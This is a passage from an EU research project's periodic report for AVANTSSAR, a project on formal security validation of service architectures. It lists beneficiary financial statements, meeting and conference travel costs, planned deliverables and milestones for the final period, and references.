Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art. II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art. II.14.1? No
Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €), if charged under this project:

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €):

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art. II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art. II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp

Name of the Person(s) Authorised to sign this Financial Statement:

Dana Petcu

Date & signature


Table 38: Costs for Period P2: IEAT (details)

Personnel, subcontracting and other major direct cost items for beneficiary 8 (IEAT) for the period P2

Work Package   Item description      Amount      Explanations
1,2,3,4,5,6    Personnel costs       22,800.00   1 senior faculty researcher, 1 postdoc, 1 doctoral student
               Subcontracting
1,2,3,4,5,6    Travel                 1,185.00   Participation in project meetings and dissemination
               TOTAL DIRECT COSTS    23,985.00


Table 39: Costs for Period P2: SAP


Form C - Financial Statement (to be filled in by each beneficiary)

Project Number: 216471
Funding scheme: Collaborative project
Project Acronym: AVANTSSAR

Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No

Legal Name: SAP AG
Participant Identity Code: 999911212

Organisation Short Name: SAP
Beneficiary nr: 9

Funding % for RTD activities (A): 50.0
If flat rate for indirect costs, specify %: N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity             RTD (A)   Demonstration (B)   Management (C)   Other (D)   Total (A+B+C+D)
Personnel costs              169,082                   0              533           0           169,615
Subcontracting                     0                   0                0           0                 0
Other direct costs             4,999                   0              916           0             5,915
Indirect costs               290,822                   0                0           0           290,822
Total costs                  464,903                   0            1,449           0           466,352
Maximum EU contribution      232,451                   0            1,449           0           233,900
Requested EU contribution    233,900

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art. II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art. II.14.1? No
Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €), if charged under this project:

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art. II.4.4? Yes

Name of the auditor: Deloitte&Touche GmbH
Cost of the certificate (in €): 0

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art. II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art. II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp

Name of the Person(s) Authorised to sign this Financial Statement:

Peter Rasper

Date & signature


Table 40: Costs for Period P2: SAP adjustment


Form C - Financial Statement (to be filled in by each beneficiary)

Project Number: 216471
Funding scheme: Collaborative project
Project Acronym: AVANTSSAR

Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? Yes
Adjustment relates to Period: 1

Legal Name: SAP AG
Participant Identity Code: 999911212

Organisation Short Name: SAP
Beneficiary nr: 9

Funding % for RTD activities (A): 50.0
If flat rate for indirect costs, specify %: N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity             RTD (A)   Demonstration (B)   Management (C)   Other (D)   Total (A+B+C+D)
Personnel costs                    0                   0                0           0                 0
Subcontracting                     0                   0                0           0                 0
Other direct costs               167                   0                0           0               167
Indirect costs               -15,972                   0              -34           0           -16,006
Total costs                  -15,805                   0              -34           0           -15,839
Maximum EU contribution       -7,902                   0              -34           0            -7,936
Requested EU contribution     -7,936

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art. II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art. II.14.1? No
Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €), if charged under this project:

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art. II.4.4? Yes

Name of the auditor: Deloitte&Touche GmbH
Cost of the certificate (in €): 0

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art. II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art. II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp

Name of the Person(s) Authorised to sign this Financial Statement:

Peter Rasper

Date & signature


Table 41: Costs for Period P2: SAP (details)

Personnel, subcontracting and other major direct cost items for beneficiary 9 (SAP) for the period P2

Work Package   Item description      Amount       Explanations
1,2,3,4,5,6    Personnel costs       169,615.00   Salary of: 1,4 full-time Senior Researchers, and 1 PhD student until Nov 2009.
               Subcontracting
1,2,3,4,5,6    Travel                  5,915.00   All the travels listed in the proper section of the PPR (plus management)
               TOTAL DIRECT COSTS    175,530.00


Table 42: Costs for Period P2: SIEMENS


Form C - Financial Statement (to be filled in by each beneficiary)

Project Number: 216471
Funding scheme: Collaborative project
Project Acronym: AVANTSSAR

Period from 01/01/2009 to 31/12/2009
Is this an adjustment to a previous statement? No

Legal Name: SIEMENS AG
Participant Identity Code: 999987260

Organisation Short Name: SIEMENS
Beneficiary nr: 10

Funding % for RTD activities (A): 50.0
If flat rate for indirect costs, specify %: N/A

1. Declaration of eligible costs/lump sum/flat-rate/scale of unit (in €)

Type of Activity             RTD (A)   Demonstration (B)   Management (C)   Other (D)   Total (A+B+C+D)
Personnel costs              232,715                   0                0           0           232,715
Subcontracting                     0                   0                0           0                 0
Other direct costs                 0                   0                0           0                 0
Indirect costs               144,905                   0                0           0           144,905
Total costs                  377,620                   0                0           0           377,620
Maximum EU contribution      188,810                   0                0           0           188,810
Requested EU contribution    188,810

2. Declaration of receipts

Did you receive any financial transfers or contributions in kind, free of charge from third parties, or did the project generate any income which could be considered a receipt according to Art. II.17 of the grant agreement? No

If yes, please mention the amount (in €)

4. Certificate on the methodology

Do you declare average personnel costs according to Art. II.14.1? No
Is there a certificate on the methodology provided by an independent auditor and accepted by the Commission according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €), if charged under this project:

5. Certificate on the financial statements

Is there a certificate on the financial statements provided by an independent auditor attached to this financial statement according to Art. II.4.4? No

Name of the auditor:
Cost of the certificate (in €):

6. Beneficiary's declaration on its honour

We declare on our honour that:

- the costs declared above are directly related to the resources used to attain the objectives of the project and fall within the definition of eligible costs specified in Articles II.14 and II.15 of the grant agreement, and, if relevant, Annex III and Article 7 (special clauses) of the grant agreement;
- the receipts declared above are the only financial transfers or contributions in kind, free of charge, from third parties and the only income generated by the project which could be considered as receipts according to Art. II.17 of the grant agreement;
- the interest declared above is the only interest yielded by the pre-financing which falls within the definition of Art. II.19 of the grant agreement;
- there is full supporting documentation to justify the information hereby declared. It will be made available at the request of the Commission and in the event of an audit by the Commission and/or by the Court of Auditors and/or their authorised representatives.

Beneficiary's Stamp

Name of the Person(s) Authorised to sign this Financial Statement:

Dr. Milos Svoboda/Caroline Wagner-Winter

Date & signature


Table 43: Costs for Period P2: SIEMENS (details)

Personnel, subcontracting and other major direct cost items for beneficiary 10 (SIEMENS) for the period P2

Work Package   Item description      Amount       Explanations
1,2,3,5,6      Personnel costs       232,715.00   Labor costs (salaries + social charges)
               TOTAL DIRECT COSTS    232,715.00


6.3 General project meetings

6.3.1 First AVANTSSAR Workshop and First Review Meeting

Brussels, Belgium. February 18–20, 2009.
First AVANTSSAR Workshop and First Review Meeting, as planned in the Description of Work.

Name of consortium participant           Departure place   Costs/€
Luca Viganò (UNIVR)                      Verona            1033.66
Mohammad Torabi Dashti (ETH Zurich)      Zurich             672.70
Michaël Rusinowitch (INRIA)              Nancy              602.52
Mathieu Turuani (INRIA)                  Nancy              595.12
Yannick Chevalier (UPS-IRIT)             Nancy                0.00
Alessandro Armando (UGDIST)              Genova            1273.59
Marius Minea (IEAT)                      Timişoara          300.00
Luca Compagna (SAP)                      Nice               721.09
Stefan Seltzsam (SIEMENS)                Munich             670.88


6.3.2 ASLan v.2 Meeting

Santa Margherita Ligure (Genova), Italy. April 21–22, 2009.
Meeting organized to converge on the definition of the second version of the specification language ASLan.

Participant                              Departure place   Costs/€
Michele Barletta (UNIVR)                 Verona             265.71
Silvio Ranise (UNIVR)                    Milano             151.83
Luca Viganò (UNIVR)                      Verona             195.88
Simone Frau (ETH Zurich)                 Zurich             408.10
Mohamed Anis Mekki (INRIA)               Nancy             1455.23
Mathieu Turuani (INRIA)                  Nancy             1693.09
Philippe Balbiani (UPS-IRIT)             Toulouse           900.00
Yannick Chevalier (UPS-IRIT)             Nancy                0.00
Alessandro Armando (UGDIST)              Genova            1588.75 (∗)
Roberto Carbone (UGDIST)                 Genova             140.90
Serena Ponta (UGDIST)                    Genova             140.90
Sebastian Mödersheim (IBM)               Zurich             334.68
Mohamed Mehdi Bouallagui (OpenTrust)     Paris             1149.73
Phouric Ung (OpenTrust)                  Paris             1149.73
Marius Minea (IEAT)                      Timişoara            0.00 (†)
Xavier Chantry (SAP)                     Nice               524.40
Jorge Cuellar (SIEMENS)                  Munich             366.95
David von Oheimb (SIEMENS)               Munich             333.45
Stefan Seltzsam (SIEMENS)                Munich             333.95

(∗) This also includes one lunch and one dinner for all project participants.
(†) For IEAT, the cost of part of the project meetings was covered by a national research grant supplementing FP7 participation.


6.3.3 2nd Synchronization Meeting

Genova, Italy. June 19–20, 2009.
Regular meeting as planned in the Description of Work.

Participant                              Departure place   Costs/€
Michele Barletta (UNIVR)                 Verona             295.10
Silvio Ranise (UNIVR)                    Milano             229.70
Luca Viganò (UNIVR)                      Verona             144.60
Cas Cremers (ETH Zurich)                 Zurich             131.80
Simone Frau (ETH Zurich)                 Zurich             295.80
Mohammad Torabi Dashti (ETH Zurich)      Zurich             599.10
Mathieu Turuani (INRIA)                  Nancy             1455.99
Yannick Chevalier (UPS-IRIT/INRIA)       Nancy              700.99
Mounira Kourjieh (UPS-IRIT)              Toulouse           754.37
Alessandro Armando (UGDIST)              Genova             800.01 (∗)
Alessandro Cappai (UGDIST)               Genova               0.00
Roberto Carbone (UGDIST)                 Genova               0.00
Serena Ponta (UGDIST)                    Genova               0.00
Sebastian Mödersheim (IBM)               Zurich             464.27
Phouric Ung (OpenTrust)                  Paris             1380.03
Marius Minea (IEAT)                      Timişoara          178.00
Xavier Chantry (SAP)                     Nice               251.65
Luca Compagna (SAP)                      Nice               411.45
David von Oheimb (SIEMENS)               Munich             386.48

(∗) This includes the cost of the meeting room, coffee breaks and dinner for all project participants.


6.3.4 WP4 Meeting

Toulouse, France. September 24–25, 2009.
Synchronization on upcoming deliverables.

Participant                              Departure place   Costs/€
Michele Barletta (UNIVR)                 Verona             724.38
Simone Frau (ETH Zurich)                 Zurich             502.40
Tigran Avanesov (INRIA)                  Nancy                0.00
Mohamed Anis Mekki (INRIA)               Nancy                0.00
Michaël Rusinowitch (INRIA)              Nancy                0.00
Mathieu Turuani (INRIA)                  Nancy                0.00
Philippe Balbiani (UPS-IRIT)             Toulouse           411.45 (∗)
Yannick Chevalier (UPS-IRIT)             Toulouse             0.00
Marwa El Houri (UPS-IRIT)                Toulouse             0.00
Roberto Carbone (UGDIST)                 Genova             430.80
Serena Ponta (UGDIST)                    Genova             419.39
Marius Minea (IEAT)                      Timişoara            0.00
Gabriel Erzse (IEAT)                     Timişoara          457.00
Wihem Arsac (SAP)                        Nice               416.62
Jorge Cuellar (SIEMENS)                  Munich             822.23

(∗) This includes the cost of the lunches, coffee breaks and one dinner for all project participants.


6.4 Working meetings

6.4.1 Definition and application of a distributed temporal logic for the analysis of security protocols and services

ETH Zurich, Zurich, Switzerland. January 11–17, 2009.
Instituto Superior Tecnico IST, Lisboa, Portugal. January 17–25, 2009.
Meeting of UNIVR and ETH Zurich with researchers at IST to work on a distributed temporal logic for the analysis of security protocols and services (WP2–6).

Participant                              Departure place   Costs/€
Luca Viganò (UNIVR)                      Verona            1126.96
David Basin (ETH Zurich)                 Zurich               0.00
Carlos Caleiro (IST)                     Lisbon               0.00
Jaime Ramos (IST)                        Lisbon               0.00


6.4.2 Technical meeting on WP5: SAML SSO

University of Genova, Italy. January 26–28, 2009.
Meeting of UGDIST and SAP researchers at the University of Genova (WP2–6). Discussed how to jointly progress on the SAML 2.0 SSO subject. Brainstorming on model checking security-relevant aspects of business processes.

Participant                              Departure place   Costs/€
Alessandro Armando (UGDIST)              Genova               0.00
Roberto Carbone (UGDIST)                 Genova               0.00
Serena Ponta (UGDIST)                    Genova               0.00
Luca Compagna (SAP)                      Nice               466.40


6.4.3 Meeting on model-checking for authorization policies

University of Milan, Italy. January 30, 2009.
Meeting of UNIVR and researchers at the University of Milan on authorization policies (WP2–6).

Participant                              Departure place   Costs/€
Michele Barletta (UNIVR)                 Verona              29.85
Silvio Ranise (UNIVR)                    Milano               0.00


6.4.4 Meeting on orchestration work

Nancy, France. March 12, 2009.
Meeting of INRIA and OpenTrust on the Orchestration tool.

Participant                              Departure place   Costs/€
Phouric Ung (OpenTrust)                  Paris               78.50
Mohamed Mehdi Bouallagui (OpenTrust)     Paris               78.50


6.4.5 Working Meeting on WP6.2: SAP NW BPM

Karlsruhe, Germany. April 20–23, 2009.
Various meetings at SAP Research Karlsruhe to discuss and to progress on the industry migration initiative about NW BPM.

Participant                              Departure place   Costs/€
Wihem Arsac (SAP)                        Nice               820.44


6.4.6 Meeting on secure pseudonymous channels

IBM, Zurich, Switzerland. June 08–14, 2009.
Meeting of UNIVR and IBM to work on the definition of secure pseudonymous channels (WP2–6).

Participant                              Departure place   Costs/€
Luca Viganò (UNIVR)                      Verona             457.66
Sebastian Mödersheim (IBM)               Zurich               0.00


6.4.7 Definition and application of a distributed temporal logic for the analysis of security protocols and services

Instituto Superior Tecnico IST, Lisboa, Portugal. July 07–20, 2009.
Meeting of UNIVR and ETH Zurich with researchers at IST to work on a distributed temporal logic for the analysis of security protocols and services (WP2–6).

Participant                              Departure place   Costs/€
Luca Viganò (UNIVR)                      Verona             885.19
David Basin (ETH Zurich)                 Zurich               0.00
Carlos Caleiro (IST)                     Lisbon               0.00
Jaime Ramos (IST)                        Lisbon               0.00


6.4.8 AVANTSSAR technical synchronization meeting on WP4 and WP6

Sophia Antipolis, France. August 25–26, 2009.
Meeting of UGDIST and SAP researchers at the SAP Labs France (WP2–6). Discussed the AVANTSSAR Validation Platform with respect to the formal validation aspect (no orchestration). Also discussed how to jointly progress on the Model Checking Security-Relevant aspects of Business Processes subject, whose outcomes are having significant impact on the industry migration path of SAP.

Participant                              Departure place   Costs/€
Alessandro Armando (UGDIST)              Genova             427.87
Luca Compagna (SAP)                      Nice                91.94 (∗)
Xavier Chantry (SAP)                     Nice                 0.00

(∗) This includes the cost of 3 dinners for SAP researchers participating in the official dinner with Prof. Alessandro Armando.


6.4.9 Working Meeting on Dynamic Policies, Services, and Composition

SAP Sophia Antipolis, France. September 10–11, 2009.
Meeting of UNIVR, ETH Zurich, UGDIST and SAP on dynamic policies, services, and composition (WP2–6).

Participant                              Departure place    Costs/€
Luca Viganò (UNIVR)                      Verona              332.79
Mohammad Torabi Dashti (ETH Zurich)      Zurich              638.50
Alessandro Armando (UGDIST)              Genova              532.24 (†)
Roberto Carbone (UGDIST)                 Genova               38.06
Serena Ponta (UGDIST)                    Genova               44.96
Wihem Arsac (SAP)                        Sophia Antipolis      0.00
Luca Compagna (SAP)                      Sophia Antipolis    102.92 (∗)
Keqin Li (SAP)                           Sophia Antipolis      0.00

(†) This includes the cost of the car, which was also used by all meeting participants departing from Genova.
(∗) This includes the cost of 4 dinners for SAP researchers participating in the two business dinners that took place.


6.4.10 Working Meeting on WP2 and WP3

ETH Zurich, Switzerland. October 26–28, 2009.
Meeting of UNIVR and ETH Zurich on WP2 and WP3.

Participant                              Departure place   Costs/€
Silvio Ranise (UNIVR)                    Milano             178.00
Cas Cremers (ETH Zurich)                 Zurich               0.00
Simone Frau (ETH Zurich)                 Zurich               0.00
Mohammad Torabi Dashti (ETH Zurich)      Zurich               0.00

Silvio Ranise was invited by ETH Zurich, which covered the costs.


6.4.11 Working Meeting on WP4 and WP5

ETH Zurich and IBM Research Lab Zurich, Switzerland. November 16–22, 2009.
Meeting of UNIVR, ETH Zurich and IBM on WP4 and WP5.

Participant                              Departure place   Costs/€
Alessandra Di Pierro (UNIVR)             Verona             360.21
Luca Viganò (UNIVR)                      Verona             302.58
Cas Cremers (ETH Zurich)                 Zurich               0.00
David Basin (ETH Zurich)                 Zurich               0.00
Simone Frau (ETH Zurich)                 Zurich               0.00
Mohammad Torabi Dashti (ETH Zurich)      Zurich               0.00
Sebastian Mödersheim (IBM)               Zurich               0.00


6.4.12 Working Meeting on WP6.2: SAP NW NGSSO and SAP NW BPM

Walldorf, Germany. November 26–27, 2009.
Various meetings in WDF to discuss the two SAP industry migration initiatives on NW SAML NGSSO and NW BPM.

Participant                              Departure place   Costs/€
Luca Compagna (SAP)                      Nice               994.98 (∗)

(∗) This trip was part of another trip to FIA Stockholm and the Workshop with the SHIELDS Project (see Subsection 6.5).


6.5 Participation in European and scientific events

6.5.1 6th ACM Workshop on Formal Methods in Security Engineering (FMSE 2008) co-located with Computer Communication Security

Hilton Alexandria Mark Center, Virginia, USA. October 27–31, 2008.
Participation in the workshop FMSE with a talk about [ACC+08] and attendance of the main conference CCS.

Participant                              Departure place    Costs/€
Luca Compagna (SAP)                      Sophia Antipolis      0.00
Alessandro Armando (UGDIST)              Genova             2539.55
Roberto Carbone (UGDIST)                 Genova             2624.21

The costs associated with the participation of Luca Compagna have already been reported in the 1st Reporting Period (cf. [AVA08a]).


6.5.2 ARES’09

4th International Conference on Availability, Reliability and Security (ARES), Fukuoka, Japan. March 16–19, 2009.
Presentation of [24] by Sebastian Mödersheim.

Participant                              Departure place   Costs/€
Sebastian Mödersheim (IBM)               Zurich            2790.98


6.5.3 ARSPA-WITS’09 and working meeting at Imperial College

University of York and Imperial College London, UK. March 25 – April 06, 2009.
Participation in ARSPA-WITS’09 (Luca Viganò co-chair of the workshop) and working meeting with researchers at Imperial College. Xavier Chantry presented [8] at ARSPA-WITS’09.

Participant                              Departure place   Costs/€
Luca Viganò (UNIVR)                      Verona            1176.06
Xavier Chantry (SAP)                     Nice               662.69 (∗)
Luca Compagna (SAP)                      Nice              1221.71 (∗)

(∗) It is important to point out that: (a) the numbers reported for SAP people comprise the cost of one trip to the UK where two different events, ARSPA-WITS’09 and IWSP 2009, were attended, and (b) originally Luca Compagna was supposed to travel and to attend the two events, but due to a serious injury, Xavier Chantry took over the trip and attendance.


6.5.4 IWSP 2009, 17th International Workshop on Security Protocols

Cambridge, UK. April 01 – April 03, 2009.
Participation in IWSP 2009, 17th International Workshop on Security Protocols, where Xavier Chantry presented [7].

Participant                              Departure place   Costs/€
Xavier Chantry (SAP)                     Nice               662.69 (∗)
Luca Compagna (SAP)                      Nice              1221.71 (∗)

(∗) It is important to point out that: (a) the numbers reported for SAP people comprise the cost of one trip to the UK where two different events, ARSPA-WITS’09 and IWSP 2009, were attended, and (b) originally Luca Compagna was supposed to travel and to attend the two events, but due to a serious injury, Xavier Chantry took over the trip and attendance.


6.5.5 Future Internet Conference Prague 2009

Prague, Czech Republic. May 10–13, 2009.

Luca Viganò gave an invited keynote at the Trust and Identity Session “Identity Provisioning in service platforms”, and participated in a panel in the Session “Trust Platforms”. Alessandro Sorniotti presented the demo of the discovery of the serious vulnerability in SAML-based SSO for Google Apps as part of the SAP booth at FIA Prague.

Participant | Departure place | Costs/€
Luca Viganò (UNIVR) | Verona | 763.51
Alessandro Sorniotti (SAP) | Nice | 823.00


6.5.6 Applied Cryptography and Network Security, 7th International Conference

Paris-Rocquencourt, France. June 2–5, 2009. Participation in the ACNS’09 Conference.

Participant | Departure place | Costs/€
Cas Cremers (ETH Zurich) | Zurich | 212.50


6.5.7 9th International School on Formal Methods for the Design of Computer, Communication and Software Systems: Web Services (SFM-09:WS)

Centro Universitario Residenziale di Bertinoro, FC, Italy. June 1–6, 2009. Participation in the school.

Participant | Departure place | Costs/€
Serena Elisa Ponta (UGDIST) | Genova | 1019.40


6.5.8 Cinquièmes Journées Francophones MODÈLES FORMELS de l’INTERACTION (MFI’09)

Lannion, France. June 3–5, 2009. Participation and presentation of [11].

Participant | Departure place | Costs/€
Pablo Seban (UPS-IRIT) | Toulouse | 390.00
Guillaume Feuillade (UPS-IRIT) | Toulouse | 650.00


6.5.9 Conference on Automated Reasoning with Analytic Tableaux and Related Methods (Tableaux) and Workshop on First-Order Theorem Proving (FTP) 2009

Oslo, Norway. July 05–20, 2009. Participation in Tableaux and FTP.

Participant | Departure place | Costs/€
Silvio Ranise (UNIVR) | Milano | 1159.27


6.5.10 Logic Colloquium 2009

Sofia, Bulgaria. July–August 2009. Invited presentation.

Participant | Departure place | Costs/€
Philippe Balbiani (UPS-IRIT) | Toulouse | 958.04


6.5.11 9th International School on Foundations of Security Analysis and Design (FOSAD)

Centro Universitario Residenziale di Bertinoro, FC, Italy. August 29 – September 04, 2009. Participation in the school and the associated workshop: Luca Viganò gave an invited lecture on “On-the-Fly Model Checking of Security Protocols and Web Services” (the participation of Alessandra Di Pierro and Luca Viganò was paid by the school); Michele Barletta gave a talk on the paper “Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented Architectures”.

Participant | Departure place | Costs/€
Michele Barletta (UNIVR) | Verona | 586.70
Alessandra Di Pierro (UNIVR) | Verona | 0.00
Luca Viganò (UNIVR) | Verona | 0.00


6.5.12 6th International Conference on Trust, Privacy and Security in Digital Business (TrustBus’09)

Linz, Austria. August 31 – September 4, 2009. Presentation of [4] by Serena Elisa Ponta.

Participant | Departure place | Costs/€
Serena Elisa Ponta (UGDIST) | Genova | 1011.67


6.5.13 12th International Information Security Conference 2009

Pisa, Italy. September 7–9, 2009. Participation in ISC’09: Marius Minea gave a talk on the paper “A calculus to detect guessing attacks”.

Participant | Departure place | Costs/€
Marius Minea (IEAT) | Brussels | 0.00


6.5.14 Summer School on Provable Security

Barcelona, Spain. September 7–11, 2009. Participation in the summer school: Bogdan Groza.

Participant | Departure place | Costs/€
Bogdan Groza (IEAT) | Timişoara | 250.00


6.5.15 ESORICS’09

14th European Symposium on Research in Computer Security (ESORICS). Saint Malo, France. September 21–23, 2009. Presentation of [25] by Sebastian Mödersheim.

Participant | Departure place | Costs/€
Sebastian Mödersheim (IBM) | Zurich | 1660.85


6.5.16 4th International Conference on Risks and Security of Internet and Systems 2009 (CRISIS 2009)

Toulouse, France. October 19–22, 2009. Presentation of [10].

Participant | Departure place | Costs/€
Marwa El Houri (UPS-IRIT) | Toulouse | 120.00


6.5.17 Stabilization, Safety, and Security of Distributed Systems, 11th International Symposium, SSS 2009

Lyon, France. November 3–6, 2009. Presentation of [30] at SSS 2009.

Participant | Departure place | Costs/€
Mohammad Torabi Dashti (ETH Zurich) | Zurich | 332.50


6.5.18 FAST’09

6th International Workshop on Formal Aspects in Security and Trust (FAST). Eindhoven, the Netherlands. November 5–6, 2009. Presentation of [16] by Mohamed Anis Mekki. Presentation of [5] by Serena Elisa Ponta. Presentation of [15] by Sebastian Mödersheim.

Participant | Departure place | Costs/€
Mohamed Anis Mekki (INRIA) | Nancy | 0.00
Serena Elisa Ponta (UGDIST) | Genova | 827.61
Sebastian Mödersheim (IBM) | Zurich | 984.47


6.5.19 Methods for Modalities (M4M 2009)

Copenhagen, Denmark. November 12–14, 2009. Presentation of [12].

Participant | Departure place | Costs/€
Guillaume Feuillade (UPS-IRIT) | Toulouse | 1250.94


6.5.20 FIA Stockholm and Workshop with the SHIELDS Project

Stockholm, Sweden. November 22–27, 2009. Participation in FIA Stockholm and workshop with Nahid Shahmehri and David Byers of the SHIELDS project.

Participant | Departure place | Costs/€
Luca Viganò (UNIVR) | Verona | 1435.29
Luca Compagna (SAP) | Nice | 994.98 (*)

(*) This trip included an AVANTSSAR working meeting on WP6 that took place in Walldorf on November 26–27 (see Subsection 6.4).


7 Planned work for the next reporting period

The next, and final, reporting period (01.01.2010 — 31.12.2010) will be mainly devoted to the completion of the project in order to achieve all the objectives listed in the Description of Work. In particular, we will: extend ASLan so that it can fully specify trust and security properties of services, their associated policies, and their composition into service architectures; develop a number of automated techniques to reason about services, their associated security policies, and their dynamic composition into secure service architectures; implement and deploy the AVANTSSAR Validation Platform, and apply it to the industrial case studies; publish a library of validated composed services and service architectures; migrate project results to industry, integrating them into service-oriented applications developed at our industrial partners, and disseminate them to standardization organizations.

The 13 deliverables due in Period P3 are shown in Table 44, together with the ongoing deliverable D6.1, and the 2 milestones of Period P3 are shown in Table 45.


Table 44: Deliverables due in Period P3

Del. no. | Deliverable name | WP no. | Lead beneficiary | Nature | Dissemination level | Delivery date from Annex I (proj. month) | Delivered Yes/No | Actual/Forecast delivery date | Comments
D1.5 | Final Project Report | 1 | UNIVR | R | PU | 36 | | |
D1.6 | Final Dissemination and Use Plan | 1 | UNIVR | R | PU | 36 | | |
D1.7 | Technology Implementation Plan | 1 | SAP | R | PU | 36 | | |
D2.3 | ASLan final version with dynamic service and policy composition | 2 | ETH Zurich | R | PU | 30 | | |
D3.1 | Decision procedures for service synthesis and satisfiability of ASLan policies | 3 | UPS-IRIT | R | PU | 30 | | |
D3.2 | Model-checking techniques | 3 | UPS-IRIT | R | PU | 32 | | |
D3.4 | Abstraction and compositional reasoning techniques for service analysis | 3 | INRIA | R | PU | 34 | | |
D4.2 | AVANTSSAR Validation Platform v.2 | 4 | UGDIST | R&P | PU | 36 | | |
D5.2 | Formalised problem cases | 5 | SAP | R&O | RE | 30 | | |
D5.3 | AVANTSSAR Library of validated problem cases | 5 | SAP | R&O | RE | 36 | | |
D5.4 | Assessment of the AVANTSSAR Validation Platform | 5 | SAP | R | PU | 36 | | |
D6.1 | AVANTSSAR Web site and Package | 6 | UNIVR | O | PU | 1–36 | Yes | | The website is being updated regularly
D6.2.3 | Migration to industrial development environments: lessons learned and best-practices | 6 | SAP | R | PU | 36 | | |
D6.3 | Migration to standardisation bodies | 6 | SIEMENS | R | PU | 36 | | |


Table 45: Milestones (and decision points) of Period P2

Milestone no. | Milestone name | WPs no’s. | Lead beneficiary | Delivery date from Annex I (proj. month) | Achieved Yes/No | Actual/Forecast delivery date | Comments
MS5 | ASLan final version, Decidability results, Formalised problem cases, and AVANTSSAR in industry | 2, 3, 5, 6 | SAP | month 30 (third synchronization meeting) | | |
MS6 | Final assessment, Migration to industry and standardisation organisations, Final Dissemination and Use Plan, and Technology Implementation plan | 1, 2, 3, 4, 5, 6 | UNIVR | month 36 (third review meeting) | | |


8 Financial statements – Forms C and Summary financial report (signed originals sent in parallel by post)

Financial statements for all beneficiaries have been submitted using NEF, and signed copies will be sent in the next days.


9 Certificates (signed originals sent in parallel by post)

Does not apply.


References

[AC08] Alessandro Armando and Luca Compagna. SAT-based Model-Checking for Security Protocols Analysis. International Journal of Information Security, 7(1):3–32, 2008.

[ACC07] Alessandro Armando, Roberto Carbone, and Luca Compagna. LTL Model Checking for Security Protocols. In Proceedings of the 20th IEEE Computer Security Foundations Symposium (CSF20). IEEE Computer Society Press, 2007.

[ACC+08] Alessandro Armando, Roberto Carbone, Luca Compagna, Jorge Cuellar, and Llanos Tobarra Abad. Formal Analysis of SAML 2.0 Web Browser Single Sign-On: Breaking the SAML-based Single Sign-On for Google Apps. In Proceedings of the 6th ACM Workshop on Formal Methods in Security Engineering (FMSE 2008). ACM Press, 2008.

[AVA08a] AVANTSSAR. Deliverable 1.3: Progress/Assessment Report for Year 1. Available at http://www.avantssar.eu, 2008.

[AVA08b] AVANTSSAR. Deliverable 2.1: Requirements for modelling and ASLan v.1. Available at http://www.avantssar.eu, 2008.

[AVA08c] AVANTSSAR. Deliverable 5.1: Problem cases and their trust and security requirements. Available at http://www.avantssar.eu, 2008.

[AVA09a] AVANTSSAR. Deliverable 4.1: AVANTSSAR Validation Platform v.1. Available at http://www.avantssar.eu, 2009.

[AVA09b] AVANTSSAR. Deliverable 2.2: ASLan v.2 with static service and policy composition. Available at http://www.avantssar.eu, 2009.

